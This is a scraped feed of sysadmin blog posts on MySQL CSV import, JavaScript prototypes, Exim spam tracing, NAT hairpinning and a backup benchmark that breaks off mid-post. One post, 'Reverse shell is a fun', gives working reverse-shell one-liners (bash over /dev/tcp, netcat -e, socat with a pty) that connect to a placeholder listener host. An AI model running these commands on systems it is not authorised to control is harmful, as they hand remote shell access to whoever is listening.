    -&gt; ignore 1 lines; 
</code></pre>

<p><em>ignore 1 lines</em> - just for omit first line with columns description.
Check it:  </p>

<pre><code>mysql&gt; select * from temp_users;  
+-------+------+--------+------------+----+
| name  | age  | result | city       | id |
+-------+------+--------+------------+----+
| Alice |   23 | true   | Sacramento | 29 |
| Bob   |   31 | false  | Austin     | 30 |
| Eve   |   25 | true   | Dallas     | 31 |
| John  |   23 | false  | undefined  | 32 |
| Steve |   34 | true   | DC         | 33 |
+-------+------+--------+------------+----+
5 rows in set (0.00 sec)  
</code></pre>

<p>Pretty simple, but very powerful. <br />
Sure, we can create dump file with <a href='https://dev.mysql.com/doc/refman/5.0/en/select-into.html' >outfile</a> too :)  </p>

<pre><code class="syntax-sql">mysql&gt; select * from temp_users into outfile "/tmp/temp_users.csv"  
    -&gt; fields terminated by "," 
    -&gt; enclosed by '"' 
    -&gt; lines terminated by "\n";
</code></pre>

<p>And get valid csv:  </p>

<pre><code>user@mysql:/tmp$ cat temp_users.csv  
"Alice","23","true","Sacramento","29"  
"Bob","31","false","Austin","30"  
"Eve","25","true","Dallas","31"  
"John","23","false","undefined","32"  
"Steve","34","true","DC","33"
</code></pre>]]></description><link>http://blog.roundside.com/import-to-mysql-from-various-files/</link><guid isPermaLink="false">9ed0ef1a-ca1d-4b41-b44e-ca6555be0fe4</guid><category><![CDATA[linux]]></category><category><![CDATA[sql]]></category><category><![CDATA[mysql]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Sun, 19 Apr 2015 06:59:32 GMT</pubDate></item><item><title><![CDATA[Reverse shell is a fun]]></title><description><![CDATA[<p><strong>Need a ssh access, but something going wrong? Read on!</strong></p>

<p>Sometimes I need shell right now, but in some cases it's impossible (no ssh on hosting or something like this). <br />
Happily that bash has built-in network pseudo interface (as a default on most distros) /dev/tcp and /dev/udp. So we can use php, ruby, etc on server to create reverse connection to listener and get shell access.</p>

<p><strong>/dev/tcp</strong></p>

<p>To use it we need redirect output from /dev/tcp to file or something else. <br />
Simple example:  </p>

<pre><code class="syntax-bash">user@host ~ $ cat &lt; /dev/tcp/time.nist.gov/13

57103 15-03-22 23:54:14 50 0 0 587.5 UTC(NIST) * 
</code></pre>

<p>Send http request:  </p>

<pre><code class="syntax-bash">user@host ~ $ exec 3&lt;&gt; /dev/tcp/roundside.com/80  
user@host ~ $ echo -e "GET / HTTP/1.1\nHost: roundside.com\nConnection: close\n\n" &gt;&amp;3  
user@host ~ $ cat &lt;&amp;3  
HTTP/1.1 200 OK  
Server: nginx/1.6.1  
Date: Mon, 23 Mar 2015 00:06:00 GMT  
Content-Type: text/html  
Content-Length: 11517  
Connection: close  
Last-Modified: Tue, 09 Dec 2014 17:40:10 GMT  
ETag: "6587d2-2cfd-509cc08e7aef5"  
Accept-Ranges: bytes  
Vary: Accept-Encoding

&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""  
...
</code></pre>

<p>A little bit different from previous. As we need to send data first, we need create file descriptor 3 for reading and writing and bind it to /dev/tcp/address/port:</p>

<pre><code>exec 3&lt;&gt; /dev/tcp/roundside.com/80  
</code></pre>

<p>Beautiful article about redirections is <a href='http://www.catonmat.net/blog/bash-one-liners-explained-part-three/' >here</a> <br />
Next, create HTTP request header and write it to file descriptor 3 to send it:  </p>

<pre><code>echo -e "GET / HTTP/1.1\nHost: roundside.com\nConnection: close\n\n" &gt;&amp;3  
</code></pre>

<p>And last, read a response.  </p>

<pre><code>cat &lt;&amp;3  
</code></pre>

<p><strong>Now, let's got a bash over tcp</strong> <br />
/dev/tcp can only connect to other addresses, so netcat or socat needed on listener.
Create a listener:  </p>

<pre><code class="syntax-bash">user@listener ~: nc -l -p 1413
</code></pre>

<p>And connect to it from target:  </p>

<pre><code class="syntax-bash">user@target ~ $ /bin/bash -c "/bin/bash -i &gt; /dev/tcp/listener_address/1413 0&gt;&amp;1 2&gt;&amp;1"  
</code></pre>

<p>Done, now we have remote shell with bash only  </p>

<pre><code class="syntax-bash">user@listener ~: nc -l -p 1413  
user@target ~ $ 
</code></pre>

<p>In this example bash in interactive mode  </p>

<pre><code class="syntax-bash">/bin/bash -i
</code></pre>

<p>(bash will source ~/.bashrc or default bash config file, so we get a little bit nicer shell) send all it stdout to listener,</p>

<pre><code class="syntax-bash">/bin/bash -i &gt; /dev/tcp/listener_address/1413
</code></pre>

<p>and all what will be send from listener will be executed in bash and redirected back to listener (stderr is also redirected, this is important)  </p>

<pre><code class="syntax-bash">/bin/bash -i &gt; /dev/tcp/listener_address/1413 0&gt;&amp;1 2&gt;&amp;1
</code></pre>

<p>More elegant:  </p>

<pre><code class="syntax-bash">/bin/bash -c "bash -i &amp;&gt; /dev/tcp/listener_address/1413 0&gt;&amp;1"
</code></pre>

<p><strong>&amp;></strong> or <strong>>&amp;</strong> will redirect both stderr and stdout to specified address.</p>

<p>Sure, <strong>netcat with '-e' parameter</strong> can be used to execute bash:  </p>

<pre><code>user@target ~ $ nc listener_address 1413 -e '/bin/bash'  
</code></pre>

<p>But there is some problem. <br />
Key shortcuts, ncurces-based programs will not work correctly. We need more tty access now, <strong>and it's a <a href='http://www.dest-unreach.org/socat/' >Socat</a> time!</strong>   </p>

<p>Socat it's like a netcat, but with extremely powerfull features (may be downloaded from <a href='http://files.roundside.com/linux/' >here</a> for Linux or <a href='http://files.roundside.com/freebsd/' >here</a> for FreeBSD, both statically linked) <br />
Create a listener:  </p>

<pre><code class="syntax-bash">user@listener ~: socat -,raw,echo=0 tcp-listen:1413  
</code></pre>

<p>And connect from target:  </p>

<pre><code class="syntax-bash">user@target ~ $ socat tcp:listener_address:1413 exec:"bash -i",pty,stderr,setsid,sigint,sane  
</code></pre>

<p>Now we can play ninvaders, use htop, mc, vim and any other cli stuff :)</p>

<p>PS: don't forget to adjust terminal size after getting reverse bash. <br />
See actual:  </p>

<pre><code>echo $LINES,$COLUMNS  
53,159
</code></pre>

<p>and export after got shell:  </p>

<pre><code>export LINES=53;export COLUMNS=159  
</code></pre>

<p>All for now.</p>

<p>Want more? <br />
<a href='http://www.dest-unreach.org/socat/doc/socat.html' >Socat man and examples page</a></p>

<p>Refs: <br />
<a href='https://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES' >https://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES</a> <br />
<a href='http://www.catonmat.net/blog/bash-one-liners-explained-part-three/' >http://www.catonmat.net/blog/bash-one-liners-explained-part-three/</a> <br />
<a href='http://www.gnucitizen.org/blog/reverse-shell-with-bash/' >http://www.gnucitizen.org/blog/reverse-shell-with-bash/</a> <br />
<a href='http://blog.rootshell.ir/2010/08/get-your-interactive-reverse-shell-on-a-webhost/' >http://blog.rootshell.ir/2010/08/get-your-interactive-reverse-shell-on-a-webhost/</a></p>]]></description><link>http://blog.roundside.com/reverse-shell-is-a-fun/</link><guid isPermaLink="false">dc296835-1c7f-4e51-9de7-e8a89441dfb0</guid><category><![CDATA[fun]]></category><category><![CDATA[linux]]></category><category><![CDATA[bash]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Mon, 23 Mar 2015 02:03:07 GMT</pubDate></item><item><title><![CDATA[Inheritance and prototype chains in JavaScript]]></title><description><![CDATA[<p>There are a lot of posts on the web about inheritance and prototypes in JS. In my opinion ones of the best comes from <a href='https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Inheritance_and_the_prototype_chain' >MDN</a>. <br />
Wait! <a href='http://dmitrysoshnikov.com/ecmascript/' >This guy</a> really knows the core of JavaScript, read his incredible articles if you want more.</p>

<p>In this post I'll try to show relations between all elements in JavaScript and an <strong>Object.prototype</strong> object, which are fundamental and parent for all other elements.</p>

<p>There are two global data types in JavaScript: <strong>primitives</strong> and <strong>objects</strong>. So, not all in JS are objects. But primitives in some cases can be converted to objects.</p>

<p>Built-in <strong>objects</strong> list are <a href='https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects' >here</a></p>

<p><strong>Primitives:</strong></p>

<ul>
<li>String  </li>
<li>Number  </li>
<li>Boolean  </li>
<li>Null  </li>
<li>undefined  </li>
</ul>

<p>But, this types of data (except <strong>null</strong> and <strong>undefined</strong>) is created by object constructors (or wrappers). For example, when we defined something like this:  </p>

<pre><code class="syntax-javascript">var word = "Hello!"  
</code></pre>

<p>the <strong>String()</strong> method is executing and new variable with type "string" is created. <br />
And as we know, <strong>primitives are immutable</strong>, so we can't add properties for string or boolean. <br />
But, how then we may know string length (which are property of foo variable)?  </p>

<pre><code class="syntax-javascript">var foo="123"  
console.log(foo.length) //3  
</code></pre>

<p><strong>All these because of prototype chain.</strong> <br />
Prototype chain - is a <a href='https://en.wikipedia.org/wiki/Prototype-based_programming' >language feature</a> that provides delegation based on prototypes, when object has it own properties as well as shared properties which are inherited.</p>

<p>All object in JavaScript has a <strong>prototype property</strong>. <br />
This property may be a link to another object or be null. The only object which prototype property is null (in normal case) is <strong>Object.prototype</strong> (more about it bellow)</p>

<p>For better understanding what is prototypes and how chains are creating, lets look at another simple example:</p>

<pre><code class="syntax-javascript">var bar = {}  
// for simplicity we can say that is a link to
var bar = new Object()
</code></pre>

<p>This simple operation in detail mean:  </p>

<ul>
<li>create <strong>Object.prototype</strong> object using Object() constructor</li>
<li>create new object <strong>bar</strong> using Object() constructor and set it prototype property to Object.prototype (bar.__proto__ === Object.prototype //true) <br />
<img src='http://files.roundside.com/content/object_pt_obj.png' ></li>
</ul>

<p>These mean, that bar object inherits all methods and properties from Object.prototype object. That's why we can get the result of bar.toString().</p>

<p>To access object prototype we can use <strong>__proto__</strong> property which will show actual prototype of object.</p>

<p><a href="#constructor">Constructor</a> - is a function that create object (more about it below), excellent article about constructors and more is <a href='http://dmitrysoshnikov.com/ecmascript/javascript-the-core/' #constructor">here</a></p>

<p>So, what is a prototype chain? <br />
In a nutshell, this is how properties are looking-up. When we call some property, for example bar.toString, if this property not found in object -  next this property will be checked in object.[[prototype]], next in object.[[prototype]].[[prototype]] and so on. Until property is found or if object.<strong>__proto__ returns null</strong>. This is mean that <strong>prototype chain is ended</strong>, and in this case property returns <strong>undefined</strong> as result. <br />
Let's create a string:  </p>

<pre><code class="syntax-javascript">var a = "foo"  
console.log(a.__proto__ === String.prototype) //true  
console.log(String.prototype.__proto__ === Object.prototype) //true  
</code></pre>

<p>And create new method in Object.prototype, that all objects can access it:  </p>

<pre><code class="syntax-javascript">Object.prototype.ping = function () {  
    return "pong"
}
console.log( a.ping() )                                   //"pong", inherited from Object.prototype  
console.log(a.hasOwnProperty("ping"))                     //false, a doesn't have ping property  
console.log(a.__proto__.hasOwnProperty("ping"))           //false, String.prototype doesn't have ping property  
console.log(a.__proto__.__proto__.hasOwnProperty("ping")) //true, ping property found in Object.protoype  
console.log(a.hasOwnProperty("toString"))                 //false, a doen't have toString property  
console.log(a.__proto__.hasOwnProperty("toString"))       //true, toString property found in String.prototype  
console.log(a.toString === String.prototype.toString)     //true  
</code></pre>

<p><strong>Note:</strong> Object.prototype also have toString property, but it's two different methods. <br />
But, if primitives can't have properties at all. How we can do that? <br />
This feature is calling <strong>autoboxing</strong> (or boxing is some cases). To access properties of primitives a temporary object is created, after properties are accessed this object is deleted:  </p>

<pre><code class="syntax-javascript">var wrapper = new String("foo")  
console.log( wrapper.ping() )  
delete wrapper  
</code></pre>

<p><img src='http://files.roundside.com/content/string_proto.svg' /></p>

<p>In <strong>"native constructors"</strong> block are located constructors that creates corresponding objects in this example. All functions (native and own) are created by <strong>Function</strong> constructor, and inherits their properties from <strong>Function.prototype</strong>.  </p>

<pre><code class="syntax-javascript">var Foo = function () {}  
//all functions inherits their properties from Function.prototype
console.log(Foo.__proto__      === Function.prototype) //true  
console.log(Function.__proto__ === Function.prototype) //true  
console.log(String.__proto__   === Function.prototype) //true  
console.log(Number.__proto__   === Function.prototype) //true  
console.log(Array.__proto__    === Function.prototype) //true  
console.log(Object.__proto__   === Function.prototype) //true  
//constructors:
console.log(Foo.prototype.constructor      === Foo)     //true  
console.log(Function.prototype.constructor === Function)//true  
console.log(String.prototype.constructor   === String)  //true  
console.log(Number.prototype.constructor   === Number)  //true  
console.log(Array.prototype.constructor    === Array)   //true  
console.log(Object.prototype.constructor   === Object)  //true  
</code></pre>

<p style="font-weight:bold" id="constructor">Constructor</p>  

<p>Constructor creates object and sets all it properties. For better understanding how it works, take a look on algorithm of function creation from <a href='http://dmitrysoshnikov.com/ecmascript/chapter-5-functions/' #algorithm-of-function-creation">Dmitry Soshnikov</a>  </p>

<pre><code class="syntax-javasript">F = new NativeObject();

/* property [[Class]] is "Function" */
F.[[Class]] = "Function"

/* a prototype of a function object */
F.[[Prototype]] = Function.prototype

/* reference to function itself */
/* [[Call]] is activated by call expression F() */
/* and creates a new execution context */
F.[[Сall]] = &lt;reference to function&gt;

/*  built in general constructor of objects */
/*  [[Construct]] is activated via "new" keyword */
/*  and it is the one who allocates memory for new */
/*  objects; then it calls F.[[Call]] */
/*  to initialize created objects passing as */
/*  "this" value newly created object */
F.[[Construct]] = internalConstructor

/*  scope chain of the current context  */
/*  i.e. context which creates function F */
F.[[Scope]] = activeContext.Scope  
/* if this functions is created  */
/* via new Function(...), then */
F.[[Scope]] = globalContext.Scope

/* number of formal parameters */
F.length = countParameters

/* a prototype of created by F objects */
__objectPrototype = new Object();  
__objectPrototype.constructor = F // {DontEnum}, is not enumerable in loops  
F.prototype = __objectPrototype

return F  
</code></pre>

<p>How about own constructors?  </p>

<pre><code class="syntax-javascript">Object.prototype.ping = function () {  
    return "pong"
}
//simple object constructor
var Foo = function () {  
    this.x = 5
    this.y = "yes"
    this.z = false
    this.check = function () {
        return this.y + ", checked"
        }
}
//create object using it
var a = new Foo()  
console.log(a.check())   //"yes, checked", own  
//another object, set prototype to a object. Now b can access all properties from a
var b = {  
    x: 13,
    z: 19,
    __proto__: a
}
console.log(b.x)                                     //13, own  
console.log(b.z)                                     //19, own  
console.log(b.y)                                     //"yes", delegated from a  
console.log(b.check())                               //"yes, checked", delegated from a  
console.log(b.ping())                                //"pong", delegated from Object.prototype  
console.log(b.ping === Object.prototype.ping)        //true  
console.log(b.toString())                            //"[object Object], delegated from Object.prototype  
console.log(b.toString === Object.prototype.toString)//true  
delete b.x                                           //own property x deleted  
console.log(b.x)                                     //5, delegated from a  
delete a.x                                           //x property from a deleted  
console.log(b.x)                                     //undefined, x property not found in prototype chain  
</code></pre>

<p><img src='http://files.roundside.com/content/own_constructors.png' /></p>

<p>Sure, modifying native objects is a bad idea. This called monkey-patching and may cause some problems. <br />
But when do this carefully, it may be very useful.</p>

<p>Also, good idea - is to protect own properties from being modified or listed in counters:</p>

<pre><code class="syntax-javascript">Object.defineProperty(String.prototype, "foo", {  
    value: function () {
        return "something"
        },
    writable: true,
    enumerable: true,
    configurable: true
 })
var x = "some text"  
for (key in x) {  
        console.log(x[key])  //some text, [Function]
}
//hide property from being listed in counters and modifying/deleting
Object.defineProperty(String.prototype, "foo", {  
    writable: false,
    enumerable: false,
    configurable: false
})
console.log(x.foo())         //"something"  
delete String.prototype.foo  
console.log(x.foo())         //"something"  
String.prototype.foo = null  
console.log(x.foo())         //"something"  
for (key in x) {  
        console.log(x[key])  //some text
}

//check it:
console.log(Object.getOwnPropertyDescriptor(String.prototype, "foo"))  
/*
{ value: [Function],
  writable: false,
  enumerable: false,
  configurable: false }
*/
</code></pre>

<p>That's all for now :)  </p>

<p>Refs: <br />
<a href='https://developer.mozilla.org/en-US/docs/Web/JavaScript' >MDN</a> <br />
<a href='http://dmitrysoshnikov.com/ecmascript/' >ECMA-262 by Dmitry Soshnikov</a> <br />
<a href='https://javascriptweblog.wordpress.com/2010/06/07/understanding-javascript-prototypes/' >Angus Croll</a>  </p>]]></description><link>http://blog.roundside.com/inheritance-and-prototype-chains-in-javascript/</link><guid isPermaLink="false">6e97bc88-ca15-4a7f-8ff1-9727d7444d04</guid><category><![CDATA[javascript]]></category><category><![CDATA[prototypes]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Mon, 09 Mar 2015 19:24:00 GMT</pubDate></item><item><title><![CDATA[Search for php spam script location. Exim & php]]></title><description><![CDATA[<p>If your server suddenly starts send a lot of mail, you need to determine where is the source of this. This maybe not so easy when server has a lot of virtual hosts. <br />
So, how we can find where spam code is located? <br />
Generally it's not so hard. We need to see the headers of mail and its contents. <br />
Often spam messages are "frozen" by local MTA due rejecting by recipient MTA (frozen messages also called bounce messages). <br />
To list frozen messages in exim:  </p>

<pre><code>[root@mta:~]# exim -bp | grep frozen
 7h  4.7K 1YIKRV-0004za-C8 &lt;&gt; *** frozen ***
 7h  4.7K 1YIKCZ-00051D-Rs &lt;&gt; *** frozen ***
 7h  7.5K 1YIKaD-0002g3-Jp &lt;&gt; *** frozen ***
 6h  6.8K 1YILJi-0006U4-LC &lt;&gt; *** frozen ***
 6h  6.6K 1YILgM-00010l-W7 &lt;&gt; *** frozen ***
 6h  6.8K 1YILo8-0002aq-O9 &lt;&gt; *** frozen ***
 6h  8.4K 1YILo5-0002d9-GO &lt;&gt; *** frozen ***
 6h  8.0K 1YILrY-00035g-Ga &lt;&gt; *** frozen ***
 5h  9.6K 1YIM2j-0004pV-PD &lt;&gt; *** frozen ***
</code></pre>

<p>Let's find script, who generate unwanted mail. To do this, look in the mails headers:</p>

<p><strong>Note</strong>: some frozen messages contain a copy of failed messages, so for X-PHP-Originating-Script header you need the <strong>body</strong> of this message, not headers. Anyway, body of spam message should be examined.</p>

<pre><code>[root@sv-114:~]# exim -Mvh 1YIM2j-0004pV-PD
1YIM2j-0004pV-PD  
joe 1060 1060  
&lt;joe@examle&gt;  
1422921664 0  
-ident joe
-received_protocol local
-body_linecount 5
-max_received_linelength 131
-auth_id joe
-auth_sender joe@example
-allow_unqualified_recipient
-allow_unqualified_sender
-local
XX  
1  
bob@example.org

175P Received: from joe by mta.example.org with local (Exim 4.80)  
    (envelope-from &lt;joe@example&gt;)
    id 1YIM2j-0004pV-PD
    for bob@examle.org; Tue, 03 Feb 2015 02:01:04 +0200
025T To: bob@examle.org  
026  Subject: Contacts request  
042  X-PHP-Originating-Script: 1060:mailer.php  
028F From: robot@examle.org  
032R Reply-To: robot@examle.org  
018  MIME-Version: 1.0  
038  Content-Type: text/html;charset=utf-8  
054I Message-Id: &lt;1YIM2j-0004pV-PD@mta.example.org&gt;  
038  Date: Tue, 03 Feb 2015 02:01:04 +0200  
</code></pre>

<p>Good. Now we know id, uid, gid of user from whom script was run and script name itself - <strong>mailer.php</strong>.    </p>

<p>Also, mail contents maybe interesting:  </p>

<pre><code>[root@mta:~]# exim -Mvb 1YIM2j-0004pV-PD
&lt;html&gt;&lt;body style='font-family:Arial,sans-serif;'&gt;&lt;h2 style='font-weight:bold;border-bottom:1px dotted #ccc;'&gt;Contacts request&lt;/h2&gt;  
&lt;p&gt;&lt;strong&gt;Want some spam? Contact us at woohoo@exampe.org&lt;/strong&gt;&lt;/p&gt;  
&lt;/body&gt;&lt;/html&gt;  
</code></pre>

<p>Adding <strong>X-PHP-Originating-Script</strong> header in mail headers must be enabled in php.ini (mail.add<em>x</em>header option).  </p>

<p>After malicious script was removed (or renamed for further research) frozen messages may be removed:  </p>

<pre><code>[root@mta ~]# exim -bpu | grep frozen | awk {'print  $3'} | xargs exim -Mrm
</code></pre>

<p>Thanks to: <a href='http://blog.wapnet.nl/2013/11/show-spam-script-on-linux-webserver/' >http://blog.wapnet.nl/2013/11/show-spam-script-on-linux-webserver/</a></p>]]></description><link>http://blog.roundside.com/search-for-php-spam-script-location-exim-php/</link><guid isPermaLink="false">36bc2d00-9408-436e-858d-11d85ed25b5c</guid><category><![CDATA[mail]]></category><category><![CDATA[exim]]></category><category><![CDATA[spam]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Mon, 02 Feb 2015 18:43:04 GMT</pubDate></item><item><title><![CDATA[A few words about NAT hairpinning]]></title><description><![CDATA[<p><a href='http://en.wikipedia.org/wiki/Hairpinning' >NAT hairpinning</a> is a very useful thing if you have something service (ssh, http, etc) behind router but don't want specify local address when you are inside local network.
So, usually SNAT (or masquerading in some cases) works like this:</p>

<p>Good article about hairpinning (and images located below too) from MikroTik wiki is <a href='http://wiki.mikrotik.com/wiki/Hairpin_NAT' >here</a></p>

<p><img src='http://files.roundside.com/content/hairpinning_scheme.png' ></p>

<p>In a nutshell, all requests comes through router and he can manipulate with client (2.2.2.2) and server (192.168.1.2) dst and src addresses. And in this case connection is established. <br />
<img src='http://files.roundside.com/content/harpin1.png' ></p>

<p>But when you try connect to 1.1.1.1 from 192.168.1.10: <br />
<img src='http://files.roundside.com/content/hairpin2.png' > <br />
Response from server goes <strong>directly from 192.168.1.2 to 192.168.1.10 and connection is dropped</strong>. Because initial connection was made to 1.1.1.1, not to 192.168.1.2.</p>

<p>And to fix this funny issue, we need just one <strong>srcnat</strong> (or masquerade, which maybe more easy to setup) rule:</p>

<p>All <strong>requests from local network to webserver that comes through router  must be NAT-ed</strong></p>

<p>(sure, in normal situations requests between two local hosts will go directly to each other using L2 OSI model)   </p>

<p><img src='http://files.roundside.com/content/hairping3.png' ></p>

<p>In this case, <strong>router will send request to web-server from his local-network interface</strong>, and after he receives response - replace web-server src address (192.168.1.2) to 1.1.1.1 and dst address from 192.168.1.1 to 192.168.1.10</p>

<p>From MikroTik Wiki:  </p>

<pre><code>/ip firewall nat 
add chain=srcnat src-address=192.168.1.0/24 \  
dst-address=192.168.1.2 protocol=tcp dst-port=80 \  
out-interface=LAN action=masquerade  
</code></pre>

<p>or if you prefer WebFig: <br />
<img src='http://files.roundside.com/content/wfig_hairping1.png' > <br />
and as action, set it to masquerade or srcnat to router local-ip: <br />
<img src='http://files.roundside.com/content/wfig_hairping2.png' ></p>

<p>That's all for now :)</p>]]></description><link>http://blog.roundside.com/a-few-words-about-nat-hairpinning/</link><guid isPermaLink="false">0092cc27-05f4-4d43-90d6-461edacaaa60</guid><category><![CDATA[networking]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Thu, 15 Jan 2015 06:31:09 GMT</pubDate></item><item><title><![CDATA[Duplicity vs rdiff-backup in action]]></title><description><![CDATA[<p><link rel="stylesheet" href='http://files.roundside.com/content/chartist.min.css' >
   <script src='http://files.roundside.com/content/chartist.min.js' ></script></p>

<p><a href='http://www.nongnu.org/rdiff-backup/index.html' >Rdiff-backup</a> is one of my favorite tools for backing up some local stuff. Why? Its pretty simple and store full backup 'as is'. So, backup files (main) can be easily accessed.</p>

<p>The main disadvantage I sow - speed. Rdiff-backup may be <strong>very slow</strong> on some files.  </p>

<h4 id="duplicityisthesolution">Duplicity is the solution?</h4>

<p><a href='http://duplicity.nongnu.org/' >Duplicity</a>, as I see, is the next generation of rdiff-backup. It has some useful things, such as: encryption, many destination protocols...and much more!</p>

<h4 id="letsmakeafewtestsnow">Let's make a few tests now.</h4>

<p>I'll use <strong>Docker</strong> for creating several isolated  containers. Some of them will be a storage and other will be hosts with important data wich we need to backing up.   </p>

<blockquote>
  <p>Feeling lazy? Jump to <a href="#resultsandconclusion">results</a> and see who is <a href="#resultsandconclusion">fastest</a> end <a href="#comparisonofusedspacestrongstylecolord7a502rdiffbackupstrongandstrongstylecolorf05b4fduplicitystrongm">efficient</a> </p>
</blockquote>

<p><strong>Containers in this example:</strong> <br />
<code>
data01    -- local node with data for rdiff-backup <br />
data02    -- remote node with ssh server and rdiff-backup <br />
storage01 -- local node with data for duplicity <br />
storage02 -- remote node with ssh server (for duplicity) <br />
</code></p>

<p><strong>Full local backup::#duplicity</strong> <br />
Local test :  </p>

<pre><code class="language-bash">docker run -ti --hostname data01 debian:latest  
</code></pre>

<pre><code class="language-shell">root@data01:/# apt-get update &amp;&amp; apt-get -y upgrade &amp;&amp; apt-get -y install duplicity  
</code></pre>

<pre><code class="language-bash">root@data01:/# cd $(mktemp -d)  
</code></pre>

<p>Now, I'll copy one of my old project from production server using bash pseudo iface /dev/tcp (netcat/socat or ssh is better for real life):  </p>

<pre><code class="language-bash">root@data01:/tmp/tmp.YMFLVKqr67# tar xvzf - &lt; /dev/tcp/test.roundside.com/5739  
</code></pre>

<pre><code class="language-bash">root@data01:/tmp/tmp.YMFLVKqr67# du -hs;find . -type f | wc -l;find . -type d | wc -l  
512M    .  
33599  
19637  
</code></pre>

<p>So, this directory has <strong>33599 files</strong>, <strong>19637 directories</strong> and takes up <strong>512MB</strong> of space.</p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ file:///var/duplicity/

Import of duplicity.backends.giobackend Failed: No module named gio  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: none  
No signatures found, switching to full backup.  
--------------[ Backup Statistics ]--------------  
StartTime 1417922856.64 (Sun Dec  7 03:27:36 2014)  
EndTime 1417922891.19 (Sun Dec  7 03:28:11 2014)  
ElapsedTime 34.55 (34.55 seconds)  
SourceFiles 53236  
SourceFileSize 443922301 (423 MB)  
NewFiles 53236  
NewFileSize 443922301 (423 MB)  
DeletedFiles 0  
ChangedFiles 0  
ChangedFileSize 0 (0 bytes)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 53236  
RawDeltaSize 362387325 (346 MB)  
TotalDestinationSizeChange 218640180 (209 MB)  
Errors 0


-------------------------------------------------

real    0m36.289s  
user    0m30.549s  
sys     0m4.578s
</code></pre>

<p>First local backup, time: 36 seconds.</p>

<h4 id="sametestwithrdiffbackupanothercontainer">Same test with rdiff-backup (another container):</h4>

<p><strong>Full local backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ /var/rdiff-backup/`

real    0m32.287s  
user    0m17.980s  
sys     0m11.658s  
</code></pre>

<p>Rdiff-backup, 32 seconds for initial local backup.</p>

<h3 id="remotebackups">Remote backups</h3>

<p>Lets make full backup to remote node (using ssh): <br />
<strong>Full remote backup::#duplicity</strong>    </p>

<p><strong>Warning:</strong> duplicity 0.6.18 has a known <em>'bug (in result of some python library)'</em> that produce   </p>

<p><code>
BackendException: ssh connection to host:22 failed: Unknown server host <br />
</code>  </p>

<p>This is because duplicity can't read ecdsa public key from known_hosts file. <br />
You can disable ecdsa HostKey on server, export custom options for duplicity ssh connection (-o HostKeyAlgorithms) or (the better way) update duplicity. Debian backports repository has 0.6.24 version, that works perfectly.   </p>

<pre><code class="language-bash">root@data01:/tmp/tmp.YMFLVKqr67# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ ssh://storage01//var/duplicity/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: none  
No signatures found, switching to full backup.  
--------------[ Backup Statistics ]--------------
StartTime 1418780684.21 (Wed Dec 17 01:44:44 2014)  
EndTime 1418780731.53 (Wed Dec 17 01:45:31 2014)  
ElapsedTime 47.32 (47.32 seconds)  
SourceFiles 53236  
SourceFileSize 443979645 (423 MB)  
NewFiles 53236  
NewFileSize 443979645 (423 MB)  
DeletedFiles 0  
ChangedFiles 0  
ChangedFileSize 0 (0 bytes)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 53236  
RawDeltaSize 362387325 (346 MB)  
TotalDestinationSizeChange 218640081 (209 MB)  
Errors 0  
-------------------------------------------------


real    0m50.069s  
user    0m38.467s  
sys     0m5.536s  
</code></pre>

<p><strong>Result:</strong> 50 seconds</p>

<p><strong>Note:</strong> pay attention to <strong>duplicity syntax</strong> for remote node <br />
<em>ssh://storage01//var/duplicity/</em> - meant /var/duplicity on remote node <br />
<em>ssh://storage01/var/duplicity/</em> - meant $HOME/var/duplicity on remote node</p>

<p><strong>Full remote backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ root@storage02::/var/rdiff-backup/

real    0m57.252s  
user    0m7.235s  
sys     0m2.590s  
</code></pre>

<p><strong>Result:</strong> 57 seconds</p>

<p><strong>Note:</strong> for remote backups same version of rdiff-backup <strong>must been installed on the remote node</strong>.</p>

<h3 id="incrementalbackups">Incremental backups</h3>

<p>Now is the time for incrementsl backups: <br />
For adding some data I'll clone node.js repo in existing local directory: <br />
<code>root@data01:/tmp/tmp.YMFLVKqr67# mkdir userdata;cd ./userdata;git clone https://github.com/joyent/node.git
</code> <br />
At this time a have <strong>43795 files</strong>, <strong>20474 directories</strong> and <strong>757MB</strong> of disk space.</p>

<p><strong>#1 Incremental local backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ file:///var/duplicity/  
Synchronizing remote metadata to local cache...  
Copying duplicity-full-signatures.20141216T213246Z.sigtar.gz to local cache.  
Copying duplicity-full.20141216T213246Z.manifest to local cache.  
Last full backup date: Tue Dec 16 21:32:46 2014  
--------------[ Backup Statistics ]--------------
StartTime 1418785790.38 (Wed Dec 17 03:09:50 2014)  
EndTime 1418785815.03 (Wed Dec 17 03:10:15 2014)  
ElapsedTime 24.65 (24.65 seconds)  
SourceFiles 64271  
SourceFileSize 677202919 (646 MB)  
NewFiles 11036  
NewFileSize 233227370 (222 MB)  
DeletedFiles 0  
ChangedFiles 0  
ChangedFileSize 0 (0 bytes)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 11036  
RawDeltaSize 229606454 (219 MB)  
TotalDestinationSizeChange 144816441 (138 MB)  
Errors 0  
-------------------------------------------------


real    0m26.750s  
user    0m23.144s  
sys     0m2.867s  
</code></pre>

<p><strong>Result:</strong> 27 seconds</p>

<p><strong>#1 Incremental remote backup::#duplicity</strong></p>

